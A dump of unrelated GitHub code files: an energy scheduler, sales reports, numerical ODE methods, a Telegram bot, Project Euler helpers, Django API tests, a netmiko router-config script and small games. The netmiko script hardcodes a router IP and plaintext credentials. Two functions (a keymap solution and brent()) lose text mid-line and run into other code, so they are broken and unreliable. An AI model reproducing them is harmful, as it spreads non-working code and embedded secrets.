pe.VarList(domain=pe.Binary)\nm.apparatenstart.construct()\nvariabelen_constructor(m.apparatenstart, aantal_apparaten, aantal_uren)\nm.voorwaarden_aantal_uren_na_elkaar = pe.ConstraintList()\naantal_uren_na_elkaar(uren_na_elkaarVAR, m.apparaten, m.voorwaarden_aantal_uren_na_elkaar, aantal_uren,\n m.apparatenstart, einduren)\n\n# voorwaarden maximale verbruik per uur\nm.voorwaarden_maxverbruik = pe.ConstraintList()\nm.voorwaarden_maxverbruik.construct()\nvoorwaarden_max_verbruik(m.apparaten, maximaal_verbruik_per_uur, m.voorwaarden_maxverbruik, wattagelijst, Delta_t,\n stroom_zonnepanelen, m.batterij_ontladen, m.batterij_opladen)\n\n# voorwaarden warmtepomp\nm.voorwaarden_warmtepomp = pe.ConstraintList()\nvoorwaarden_warmteboiler(namen_apparaten, m.apparaten, m.voorwaarden_warmtepomp, verliesfactor_huis_per_uur,\n temperatuurwinst_per_uur, begintemperatuur_huis, ondergrens, bovengrens, aantal_uren)\n\n# voorwaarden batterij\nm.voorwaarden_batterij = pe.ConstraintList()\nvoorwaarden_batterij(m.batterij_ontladen, m.batterij_opladen, m.voorwaarden_batterij, aantal_uren,\n huidig_batterijniveau, batterij_bovengrens)\n\nresult = solver.solve(m)\n\nprint(result)\n# waarden teruggeven\nvast_verbruik_aanpassen(verbruik_gezin_totaal, current_hour)\n\nkost, apparaten_aanofuit, nieuw_batterijniveau, nieuwe_temperatuur, pos_of_neg_opladen= uiteindelijke_waarden(m.apparaten, aantal_uren,\n namen_apparaten,\n wattagelijst,\n huidig_batterijniveau,\n verliesfactor_huis_per_uur,\n temperatuurwinst_per_uur,\n begintemperatuur_huis, m.batterij_ontladen,\n m.batterij_opladen)\n\n# deze functies passen de lijsten aan, rekening houdend met de apparaten die gewerkt hebben op het vorige uur\nverlagen_aantal_uur(m.apparaten, aantal_uren, werkuren_per_apparaat, namen_apparaten)\n\n# deze lijn moet sws onder 'verlagen exacte uren' staan want anders voeg je iets toe aan de database en ga je vervolgens dit opnieuw verlagen\nopeenvolging_opschuiven(m.apparaten, aantal_uren, uren_na_elkaarVAR, voorwaarden_apparaten_exact)\n\nres = cur.execute(\"SELECT Apparaten FROM Geheugen\")\nListTuplesApparaten = res.fetchall()\nindex = -1\nApparaten = tuples_to_list(ListTuplesApparaten, \"Apparaten\", index)\nif len(Apparaten) != len(ListTuplesApparaten):\n index = len(Apparaten)\nres = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\nListTuplesExacteUren = res.fetchall()\nExacteUren = tuples_to_list(ListTuplesExacteUren, \"ExacteUren\", index)\n\nverlagen_exacte_uren(ExacteUren)\n\nres = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\nListTuplesUrenWerk = res.fetchall()\nUrenWerk = 
tuples_to_list(ListTuplesUrenWerk, \"UrenWerk\", index)\n\nverwijderen_uit_lijst_wnr_aantal_uur_0(UrenWerk, wattagelijst, voorwaarden_apparaten_exact, prijzen,\n einduren, aantal_uren)\n\nres = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\nListTuplesFinaleTijdstip = res.fetchall()\nFinaleTijdstip = tuples_to_list(ListTuplesFinaleTijdstip, \"FinaleTijdstip\", index)\n\nverlagen_finale_uur(FinaleTijdstip)\n\nverlagen_start_uur(starturen)\ncon.commit()\n'''\n#Nu zullen er op basis van de berekeningen aanpassingen moeten gedaan worden aan de database\n#wnr iets het eerste uur wordt berekend als 'aan' dan moeten er bij de volgende berekeningen er mee rekening gehouden worden\n#dat dat bepaald apparaat heeft gedraaid op dat uur, dus aantal draai uur is een uur minder, en wnr het drie uur na elkaar moest draaien en het eerste uur werd aangeduid als 'aan', dan moet bij de volgende berekening 1 en 2 nog als 'aan' aangeduid worden\n#een batterij is eigenlijk ook gwn aantal uur dat die nog moet werken een uur verlagen\n\n#nog overal in elke functie bijzetten wat er moet gebeuren als er geen integer in staat maar die string\n'''","repo_name":"vannesaugust/P-O3","sub_path":"Geheel algoritme/O_abstract_model.py","file_name":"O_abstract_model.py","file_ext":"py","file_size_in_byte":41853,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30669829150","text":"SALESPERSON_INDEX = 0\nINTERNET_INDEX = 1\n\n#Sets melon prices\nmelon_prices = {\"Musk\": 1.15, \"Hybrid\": 1.30, \n \"Watermelon\": 1.75, \"Winter\": 4.00 }\n\n#Prints pretty line of stars\nprint(\"*\" * 80)\n\n\ndef get_melon_sales(melon_type_orders):\n \"\"\" Takes in a sales order and provides data on # of each melon sold,\n price of melon, and total sales revenue for each melon.\"\"\"\n \n #Opens file\n melon_order = open(melon_type_orders)\n #Sets empty dictionary\n melon_type_data = {}\n\n #sets up count dictionary per melon\n for line in melon_order:\n order_num, melon_type, melon_count = line.split(\"|\")\n melon_count = int(melon_count)\n if melon_type in melon_type_data:\n melon_type_data[melon_type][\"Count\"] += melon_count\n else:\n melon_type_data[melon_type] = {\"Count\": melon_count}\n\n #adds Price and Sales_Total dictionary per melon\n for melon_type in melon_prices:\n melon_type_data[melon_type][\"Price\"] = melon_prices[melon_type]\n melon_type_data[melon_type][\"Sales_Total\"] = \\\n melon_type_data[melon_type][\"Price\"] * \\\n melon_type_data[melon_type][\"Count\"]\n \n #Prints the sales report per melon \n for melon_type in melon_type_data:\n print(\"We sold {} {} melons at ${:.2f} each for a total of ${:.2f}\"\\\n .format(melon_type_data[melon_type][\"Count\"],\\\n melon_type, melon_type_data[melon_type][\"Price\"],\\\n melon_type_data[melon_type][\"Sales_Total\"]))\n \n melon_order.close()\nget_melon_sales(\"orders-by-type.txt\")\n\n\nprint(\"*\" * 80)\n\ndef sales_type_summary(sales_file):\n sales_info = open(sales_file)\n \n sales_person_revenue = 0\n online_revenue = 0\n\n #Unpacks sales info doc\n for line in sales_info:\n sale_num, id_num, name, revenue = line.split(\"|\")\n id_num = int(id_num)\n\n #adds revenue to appropriate sales type\n if id_num > 0:\n sales_person_revenue += float(revenue)\n else:\n online_revenue += float(revenue)\n\n #Prints sales type summary \n print(\"Salespeople generated ${:.2f} in revenue.\".format(sales_person_revenue))\n print(\"Internet sales generated ${:.2f} in revenue.\".format(online_revenue))\n\n #evaluates 
efficacy of sales people \n if sales_person_revenue > online_revenue:\n print(\"Guess there's some value to those salespeople after all.\")\n else:\n print(\"Time to fire the sales team! Online sales rule all!\")\n\nsales_type_summary(\"orders-with-sales.txt\")\nprint(\"*\" * 80)\n\n# sales = [0, 0]\n# for line in f:\n# d = line.split(\"|\")\n# if d[1] == \"0\":\n# sales[0] += float(d[3])\n# else:\n# sales[1] += float(d[3])\n# print(\"Salespeople generated ${:.2f} in revenue.\".format(sales[1]))\n# print(\"Internet sales generated ${:.2f} in revenue.\".format(sales[0]))\n# if sales[1] > sales[0]:\n# print(\"Guess there's some value to those salespeople after all.\")\n# else:\n# print(\"Time to fire the sales team! Online sales rule all!\")\n# print(\"******************************************\")\n","repo_name":"CoderCarrot/HB_Homework","sub_path":"melon-sales-report/accounting.py","file_name":"accounting.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9943002655","text":"#!/usr/bin/python3\n\"\"\"Defines a class Square\"\"\"\n\n\nclass Square:\n \"\"\"Represents a square\n Attributes:\n __size (int): length of a side of the square\n \"\"\"\n def __init__(the_square, size=0):\n \"\"\"initializing square\n Args:\n size (int): length of a side of the square\n Returns:\n Nothing\n \"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n else:\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n the_square.__size = size\n\n def area(the_square):\n \"\"\"computes the area of a square.\n Returns:\n area of square\n \"\"\"\n return (the_square.__size) ** 2\n","repo_name":"JoelCann/alx-higher_level_programming","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12890957452","text":"from collections import defaultdict\ndef solution(keymap, targets):\n answer = []\n dic=defaultdict(int)\n #각 키에 접근하려면 몇번을 눌러야하는지를 저장\n for i in keymap:\n for j,alpa in enumerate(i):\n if dic[alpa] and dic[alpa]>j+1: #더 적게 눌러서 가능하면\n dic[alpa]=j+1\n elif dic[alpa] and dic[alpa]\", callback)\nroot.mainloop()\n","repo_name":"TimKuhn/picasso","sub_path":"picasso/annotation_tool.py","file_name":"annotation_tool.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32422826869","text":"from abc import ABC, abstractmethod\n\n\ndef dy_over_dx(x, y):\n return - ((y * y) / 3) - 2 / (3 * x * x)\n\n\nclass NumericalMethod(ABC):\n def __init__(self):\n pass\n\n def build_solution(self, x0, y0, X, N, **kwargs):\n step = (X - x0) / N\n\n x_points = [x0]\n y_points = [y0]\n\n x0 += step\n\n i = 1\n while x0 <= X:\n x_points += [x0]\n y_points += [y_points[i - 1] + self.recurrent_formula(x_points[i - 1], y_points[i - 1], step)]\n x0 += step\n i += 1\n\n return x_points, y_points\n\n @abstractmethod\n def recurrent_formula(self, prev_x, prev_y, step):\n pass\n\n def get_lte(self, x0, y0, X, N, exact_solution, **kwargs):\n x_points, approximate = self.build_solution(x0, y0, X, N)\n _, exact = exact_solution.build_solution(X, N)\n\n errors = []\n for appr, ex in zip(approximate, exact):\n errors += [abs(ex - appr)]\n\n return x_points, errors\n\n def get_gte(self, x0, y0, X, n, N, exact_solution, **kwargs):\n max_errors = 
[]\n\n        for steps in range(n, N + 1):\n            max_errors += [max(self.get_lte(x0, y0, X, steps, exact_solution)[1])]\n\n        return list(range(n, N + 1)), max_errors\n\n\n\nclass EulerMethod(NumericalMethod):\n    def __init__(self):\n        super().__init__()\n\n    def recurrent_formula(self, prev_x, prev_y, step):\n        return step * dy_over_dx(prev_x, prev_y)\n\n\n\nclass ImprovedEulerMethod(NumericalMethod):\n    def __init__(self):\n        super().__init__()\n\n    def recurrent_formula(self, prev_x, prev_y, step):\n        return step * dy_over_dx(prev_x + step / 2, prev_y + (step / 2) * dy_over_dx(prev_x, prev_y))\n\nclass RungeKuttaMethod(NumericalMethod):\n    def __init__(self):\n        super().__init__()\n\n    def recurrent_formula(self, prev_x, prev_y, step):\n        half_step = step / 2\n\n        k1 = dy_over_dx(prev_x, prev_y)\n        k2 = dy_over_dx(prev_x + half_step, prev_y + half_step * k1)\n        k3 = dy_over_dx(prev_x + half_step, prev_y + half_step * k2)\n        k4 = dy_over_dx(prev_x + step, prev_y + step * k3)\n\n        return (step / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n\n\n# tests\nif __name__ == '__main__':\n    from exact_solution import MySolution\n\n    solution = MySolution(1, 2)\n\n    merge = lambda a: list(zip(*a))\n\n    euler = EulerMethod()\n    print(merge(euler.build_solution(1, 2, 5, 10)))\n    print()\n    print(merge(euler.get_lte(1, 2, 5, 10, solution)))\n    print()\n    print()\n\n    improved_euler = ImprovedEulerMethod()\n    print(merge(improved_euler.build_solution(1, 2, 5, 10)))\n    print()\n    print(merge(improved_euler.get_lte(1, 2, 5, 10, solution)))\n    print()\n    print()\n\n    runge_kutta = RungeKuttaMethod()\n    print(merge(runge_kutta.build_solution(1, 2, 5, 10)))\n    print()\n    print(merge(runge_kutta.get_lte(1, 2, 5, 10, solution)))\n    print()\n    print()\n","repo_name":"elatypov20/ComputationalPracticum_DifferentialEquations","sub_path":"numerical_methods.py","file_name":"numerical_methods.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
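The RK4 update used by RungeKuttaMethod above can be exercised standalone; a minimal sketch, mirroring the module's dy_over_dx and its initial point (1, 2) — the step size is illustrative:

def dy_over_dx(x, y):
    return -(y * y) / 3 - 2 / (3 * x * x)

def rk4_step(x, y, h):
    # classic 4th-order Runge-Kutta step, same weights as recurrent_formula
    k1 = dy_over_dx(x, y)
    k2 = dy_over_dx(x + h / 2, y + h / 2 * k1)
    k3 = dy_over_dx(x + h / 2, y + h / 2 * k2)
    k4 = dy_over_dx(x + h, y + h * k3)
    return y + (h / 6) * (k1 + 2 * k2 + 2 * k3 + k4)

print(rk4_step(1.0, 2.0, 0.4))  # one step from the IVP point (1, 2)
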
+{"seq_id":"72876420328","text":"import os\n\nfrom telegram import Bot, ForceReply, Update, ParseMode, message\nfrom telegram.ext import (\n    CallbackContext,\n    CommandHandler,\n    Filters,\n    MessageHandler,\n    Updater,\n)\nfrom .message_utils import _format_message\n\nTOKEN = os.getenv(\"TELEGRAM_TOKEN\")\nCHANNEL_ID = os.getenv(\"CHANNEL_ID\")\n# retrieve the channel_id by adding the bot to the channel\n# and calling the get_updates method on the bot object\n\nbot = Bot(token=TOKEN)\n\n\ndef send_message(message_dict):\n    formatted_message = _format_message(message=message_dict)\n    bot.send_message(CHANNEL_ID, text=formatted_message, parse_mode=ParseMode.HTML)\n\n\n# def start(update: Update, context: CallbackContext) -> None:\n#     \"\"\"Send a message when the command /start is issued.\"\"\"\n#     update.message.reply_text(\n#         \"hello, here is your metadata {}\".format(update.to_json())\n#     )\n\n\n# updater = Updater(TOKEN)\n\n# # Get the dispatcher to register handlers\n# dispatcher = updater.dispatcher\n\n# # on different commands - answer in Telegram\n# dispatcher.add_handler(CommandHandler(\"start\", start))\n# # Start the Bot\n# updater.start_polling()\n\n# # Run the bot until you press Ctrl-C or the process receives SIGINT,\n# # SIGTERM or SIGABRT. This should be used most of the time, since\n# # start_polling() is non-blocking and will stop the bot gracefully.\n# updater.idle()\n","repo_name":"sreevardhanreddi/vaccination_telegram_bot","sub_path":"tele_bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"7804926033","text":"from visual import *\nimport orbit\n\norbit.makeAxis(3, .02)\n\n\ntime = 0\ntime_delta = .01\n\nsun = sphere(pos = vector(0,0,0), radius = .25)\nearth = sphere(pos = vector(1,0,0), radius = .08, color = color.red)\nasteroid = sphere(pos = vector(.9,0,0), radius = .05, color = color.blue)\njupiter = sphere(pos = vector(5,0,0), radius = .12, color = color.orange )\n\nearth_curve = curve(color = color.red, )\nasteroid_curve = curve(color = color.blue, )\njupiter_curve = curve(color = color.orange, )\n\nearth_V = vector(0, 1, 0)\nasteroid_V = vector(0, 1.3, 0)\njupiter_V = vector(0, .5, 0)\n\npreturb_masses = [1, .005, .5]\n\nmin_distance = mag(earth.pos-asteroid.pos)\nyears = 100\n\nwhile(True):\n    rate(45)\n\n\n    earth.pos, earth_V = orbit.RK4(earth.pos, earth_V, time_delta)\n    jupiter.pos, jupiter_V = orbit.RK4(jupiter.pos, jupiter_V, time_delta)\n\n    preturb_positions = [vector(0,0,0), earth.pos, jupiter.pos]\n\n\n    asteroid.pos, asteroid_V = orbit.preturb2(asteroid.pos, asteroid_V, preturb_positions, preturb_masses, time_delta)\n\n    time += time_delta\n    earth_curve.append(earth.pos)\n    jupiter_curve.append(jupiter.pos)\n\n    asteroid_curve.append(asteroid.pos)\n\n\n\n    #find collision points\n    if (mag(asteroid.pos-earth.pos) < .01):\n        collision_point = sphere(pos = asteroid.pos, radius = .01, color = color.orange)\n\n    #time_label = label(pos = vector(1.5,1.5,0), height = .1, text = \"T = {} \".format(time),)\n","repo_name":"kh2026/astrophysics_summer_research","sub_path":"ps5p5xc.py","file_name":"ps5p5xc.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73921673448","text":"#useful functions for project euler\nfrom math import *\nimport sys\nimport random\nimport fractions\n\ndef length(x):\n    logs = ceil(log10(x))\n    return int(logs)\n\n\n# Returns F(n)\ndef fibonacci(n):\n    if n < 0:\n        raise ValueError(\"Negative arguments not implemented\")\n    return _fib(n)[0]\n\n\n# Returns a tuple (F(n), F(n+1))\ndef _fib(n):\n    if n == 0:\n        return (0, 1)\n    else:\n        a, b = _fib(n / 2)\n        c = a * (2 * b - a)\n        d = b * b + a * a\n        if n % 2 == 0:\n            return (c, d)\n        else:\n            return (d, c + d)\n\n'''\ndef isPrime(x):\n    for i in range(2, int(sqrt(x)) + 1):\n        if x % i == 0:\n            return False\n    return True\n'''\n\n\n\ndef toBinary(n):\n    r = []\n    while (n > 0):\n        r.append(n % 2)\n        n = n / 2\n    return r\n\ndef test(a, n):\n    \"\"\"\n    test(a, n) -> bool Tests whether n is composite.\n    \n    Returns:\n    - True, if n is composite.\n    - False, if n is probably prime.\n    \"\"\"\n    b = toBinary(n - 1)\n    d = 1\n    for i in xrange(len(b) - 1, -1, -1):\n        x = d\n        d = (d * d) % n\n        if d == 1 and x != 1 and x != n - 1:\n            return True # composite\n        if b[i] == 1:\n            d = (d * a) % n\n    if d != 1:\n        return True # composite\n    return False # probably prime\n\ndef isPrime(n):\n    \"\"\"\n    isPrime(n) -> bool Checks whether n is prime or not, using s = 50 rounds of Miller-Rabin\n    \n    Returns:\n    - True, if n is probably prime.\n    - False, if n is composite.\n    \"\"\"\n    s = 50\n    for j in xrange(1, s + 1):\n        a = random.randint(1, n - 1)\n        if (test(a, n)):\n            return False # n is composite\n    return True # n is prime\n
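A short usage sketch for the Miller-Rabin test above (Python 2 style, matching the module's xrange/print conventions; the sample numbers are illustrative):

for n in [97, 561, 2147483647]:
    print n, isPrime(n)   # 97 prime; 561 is a Carmichael number, still caught; 2**31-1 prime
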
return True # n is prime\n\ndef pfactorexp(x):\n pfactors = []\n for p in primes:\n if p > x:\n return pfactors\n if x % p == 0:\n exp = 1\n x /= p\n while x % p == 0:\n x /= p\n exp += 1\n pfactors.append((p,exp))\n return pfactors\n\ndef pfactor(x):\n pfactors = []\n num = 0\n for p in primes:\n if p > x:\n return pfactors\n if x % p == 0:\n pfactors.append(p)\n num += 1\n return pfactors\n\n\ndef esieve(x):\n primes = []\n sieve = [0]*x\n lim = int(sqrt(x))+1\n i = 2\n for i in xrange(2,lim):\n if sieve[i]==0:\n primes.append(i)\n for j in xrange(i*i,x,i):\n sieve[j] = 1\n for k in xrange(i,x):\n if sieve[k]==0:\n primes.append(k)\n return primes\n\n\ndef brent(N):\n if N%2==0:\n return 2\n y,c,m = random.randint(1, N-1),random.randint(1, N-1),random.randint(1, N-1)\n g,r,q = 1,1,1\n while g==1: \n x = y\n for i in range(r):\n y = ((y*y)%N+c)%N\n k = 0\n while (k<r and g==1):\n ys = y\n for i in range(min(m,r-k)):\n y = ((y*y)%N+c)%N\n q = q*(abs(x-y))%N\n g = fractions.gcd(q,N)\n k = k + m\n r = r*2\n if g==N:\n while True:\n ys = ((ys*ys)%N+c)%N\n g = fractions.gcd(abs(x-ys),N)\n if g>1:\n break\n return g\n","repo_name":"jhuang314/euler","sub_path":"eulerF.py","file_name":"eulerF.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15575601728","text":"import json\nimport tarfile\n\nfrom classes.nlu_corpus import NLUCorpus, NLUToBePredict\nfrom classes.ser_corpus import SERCorpus, SERToBePredict\nfrom collections import OrderedDict\n\n\ndef read_json(file_name):\n file_name = file_name.split('!')\n with tarfile.open(file_name[0]) as file:\n content = json.load(file.extractfile(file_name[1][1:]), object_pairs_hook=OrderedDict)\n if content['0'].get(\"text\", None) is not None: # NLU part\n if content['0'].get(\"intent\", None) is not None:\n return NLUCorpus(content)\n else:\n return NLUToBePredict(content)\n else: # SER part\n if content['0'].get(\"valence\", None) is not None:\n return SERCorpus(content)\n else:\n return SERToBePredict(content)\n\n\ndef write_json(file_name, corpus):\n output_dict = {}\n if type(corpus) == NLUToBePredict:\n for sample in corpus.samples:\n s = {\n \"intent\": sample.intent,\n \"text\": sample.text,\n \"slots\": sample.slots\n }\n output_dict[sample.id] = s\n\n elif type(corpus) == SERToBePredict:\n for sample in corpus.samples:\n s = {\n \"features\": sample.features\n }\n if sample.label == 3:\n s[\"valence\"] = 1\n s[\"activation\"] = 1\n elif sample.label == 2:\n s[\"valence\"] = 1\n s[\"activation\"] = 0\n elif sample.label == 1:\n s[\"valence\"] = 0\n s[\"activation\"] = 1\n elif sample.label == 0:\n s[\"valence\"] = 0\n s[\"activation\"] = 0\n else:\n raise ValueError\n output_dict[sample.id] = s\n else:\n raise TypeError\n with open(file_name, 'w') as file:\n file.writelines(json.dumps(output_dict))\n\n\nif __name__ == '__main__':\n a = read_json(\n '/Users/duan/OneDrive - Aerodefense/Uni-Stuttgart/WS19/Deep learning/DeepDarkHomeword/ser_traindev.tar.gz!/dev.json')\n gen = {}\n import random\n for i in range(len(a.samples)):\n gen[str(i)] = {\"valence\": random.randrange(0, 2, 1),\n \"activation\": random.randrange(0, 2, 1)}\n with open('sertest.json', 'w') as f:\n import json\n f.write(json.dumps(gen, indent=2))\n","repo_name":"Fireblossom/DeepDarkHomework","sub_path":"util/IO_util.py","file_name":"IO_util.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70607774250","text":"'''\nHomework 2\nBy: Evelyn Yach (20071956) & Daniel Oh (20063998)\n2021.02.02\n'''\n\n'''\nPlace n Queens on the board without conflict\n'''\ndef check(board, row, 
col):\n #check row, left\n for i in range(n):\n if board[row][i] == 1:\n return False\n\n #check diagonal, upper left\n #zip() > joins two tuples together\n for i, j in zip(range(row, -1, -1),range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n #check diagonal, lower left\n for i, j in zip(range(row, n),range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n return True\n\ndef queens(n):\n #create an nxn board\n board = [[0] * n for p in range(n)]\n \n #find a solution\n def recursion(j):\n #base case\n if j >= n:\n return True\n\n #recursion\n for i in range(n):\n if check(board, i, j):\n\n #place queen on board\n board[i][j] = 1\n\n #place rest of queens on board\n if recursion(j + 1) == True:\n return True\n\n #if placing a queen didn't lead to a solution\n #YEET IT\n board[i][j] = 0\n\n #if no queen can be placed in present column\n return False \n\n if recursion(0) == False:\n print(\"No solution exists\")\n return []\n\n return board\n \n\n'''\nPrint the board\n'''\ndef printBoard(board, n):\n for i in range(0,n):\n print(board[i])\n\n\nif __name__ == '__main__':\n\n #board size\n n = 10\n \n #place queens in safety\n board = queens(n)\n\n #print the board\n #where 1 marks a square holding a queen with no\n #conflicts\n if len(board) != 0:\n printBoard(board, n)\n \n \n \n","repo_name":"Dan-Ial/DanEvCISC471","sub_path":"Assignment2/nQueens.py","file_name":"nQueens.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24300745847","text":"\"\"\"\nTests for the ingredients API.\n\"\"\"\nfrom decimal import Decimal\n\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import (\n Ingredient,\n Recipe,\n)\n\nfrom recipe.serializers import IngredientSerializer\n\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef detail_url(ingredient_id):\n \"\"\"Create and return an ingredient detail URL.\"\"\"\n return reverse('recipe:ingredient-detail', args=[ingredient_id])\n\n\ndef create_user(email='user@example.com', password='testpass123'):\n \"\"\"Create and return user.\"\"\"\n return get_user_model().objects.create_user(email=email, password=password)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\"Test unauthenticated API requests.\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_auth_required(self):\n \"\"\"Test auth is required for retrieving ingredients.\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateIngredientsApiTests(TestCase):\n \"\"\"Test authenticated API requests.\"\"\"\n\n def setUp(self):\n self.user = create_user()\n self.client = APIClient()\n self.client.force_authenticate(self.user)\n\n def test_retrieve_ingredients(self):\n \"\"\"Test retrieving a list of ingredients.\"\"\"\n Ingredient.objects.create(user=self.user, name='Kale')\n Ingredient.objects.create(user=self.user, name='Vanilla')\n\n res = self.client.get(INGREDIENTS_URL)\n\n ingredients = Ingredient.objects.all().order_by('-name')\n serializer = IngredientSerializer(ingredients, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Test list of ingredients is limited to authenticated user.\"\"\"\n 
user2 = create_user(email='user2@example.com')\n Ingredient.objects.create(user=user2, name='Salt')\n ingredient = Ingredient.objects.create(user=self.user, name='Pepper')\n\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], ingredient.name)\n self.assertEqual(res.data[0]['id'], ingredient.id)\n\n def test_update_ingredient(self):\n \"\"\"Test updating an ingredient.\"\"\"\n ingredient = Ingredient.objects.create(user=self.user, name='Cilantro')\n\n payload = {'name': 'Coriander'}\n url = detail_url(ingredient.id)\n res = self.client.patch(url, payload)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n ingredient.refresh_from_db()\n self.assertEqual(ingredient.name, payload['name'])\n\n def test_delete_ingredient(self):\n \"\"\"Test deleting an ingredient.\"\"\"\n ingredient = Ingredient.objects.create(user=self.user, name='Lettuce')\n\n url = detail_url(ingredient.id)\n res = self.client.delete(url)\n\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n ingredients = Ingredient.objects.filter(user=self.user)\n self.assertFalse(ingredients.exists())\n\n def test_filter_ingredients_assigned_to_recipes(self):\n \"\"\"Test listing ingredients limited to those assigned to recipes.\"\"\"\n in1 = Ingredient.objects.create(user=self.user, name='Apples')\n in2 = Ingredient.objects.create(user=self.user, name='Turkey')\n recipe = Recipe.objects.create(\n title='Apple Crumble',\n time_minutes=5,\n price=Decimal('4.50'),\n user=self.user,\n )\n recipe.ingredients.add(in1)\n\n res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})\n\n s1 = IngredientSerializer(in1)\n s2 = IngredientSerializer(in2)\n self.assertIn(s1.data, res.data)\n self.assertNotIn(s2.data, res.data)\n\n def test_filtered_ingredients_unique(self):\n \"\"\"Test filtered ingredients returns a unique list.\"\"\"\n ing = Ingredient.objects.create(user=self.user, name='Eggs')\n Ingredient.objects.create(user=self.user, name='Lentils')\n recipe1 = Recipe.objects.create(\n title='Eggs Benedict',\n time_minutes=60,\n price=Decimal('7.00'),\n user=self.user,\n )\n recipe2 = Recipe.objects.create(\n title='Herb Eggs',\n time_minutes=20,\n price=Decimal('4.00'),\n user=self.user,\n )\n recipe1.ingredients.add(ing)\n recipe2.ingredients.add(ing)\n\n res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})\n\n self.assertEqual(len(res.data), 1)\n","repo_name":"LondonAppDeveloper/c2-recipe-app-api-2","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"53"} +{"seq_id":"15741878694","text":"from netmiko import ConnectHandler\nimport re\nR1 = {\n 'device_type' : 'cisco_ios',\n 'ip' : '10.82.139.122',\n 'username':'admin',\n 'password':'cisco!123',\n 'secret' : 'cisco!123',\n}\n\nconn = ConnectHandler(**R1)\nprint(\"Connection established\")\nip = input('Enter ip add:')\nmask = input('Enter mask:')\n\nip_add = 'ip address ' + ip + ' ' + mask\nconfig_commands = ['int loopback 11', ip_add , 'no shut' ]\n\nif not conn.check_enable_mode():\n conn.enable()\ncfg = 
conn.send_config_set(config_commands)\n\nprint(cfg)\n\n\n\n","repo_name":"patiladarsh94/Network_Automation","sub_path":"Network_Auto/device_netmiko.py","file_name":"device_netmiko.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39318093177","text":"\nimport random\n\n#Printing out the user's instructions\nprint('I am thinking of a 3 digit number. Try to guess what it is.')\nprint('Here are some clues:')\nprint('When I say:\\t\\tThat means:')\nprint('Pico\\t\\t\\tOne digit is correct but in the wrong position.')\nprint('Fermi\\t\\t\\tOne digit is correct and in the right position.')\nprint('Bagels\\t\\t\\tNo digit is correct')\nprint('I have thought up a number.\\nYou have ten guesses to get it.')\n\n\nuser_active = True\n\n#Main loop for the game\nwhile user_active:\n\n comp_num = str(random.randint(100,999))\n # print(comp_num) #Check line\n num_guesses = 1\n\n #Checking user guesses\n while num_guesses < 11:\n print(f\"Guess #{num_guesses}\")\n \n #checking that the input is valid\n while True:\n guess = str(input())\n if len(guess) != len(comp_num):\n print(\"Oops, that's not a 3 digit number - please guess again:\")\n else:\n break\n \n #Checking If the user has guessed correctly, otherwise running the bagels \n #check function\n if guess == comp_num:\n print('Congratulations! You guessed correctly!')\n break\n else: \n bagels_check = True\n\n for i in range(len(guess)):\n if guess[i] == comp_num[i]:\n print('Fermi')\n bagels_check = False\n elif guess[i] in comp_num:\n print('Pico')\n bagels_check = False\n \n if bagels_check:\n print('Bagels') \n\n num_guesses += 1\n\n print('Would you like to keep playing? (Y/N)')\n \n #Checking that input is valid\n while True:\n user_choice = input().upper()\n if user_choice == 'N' or user_choice == 'Y':\n break\n else:\n print(\"Whoops! 
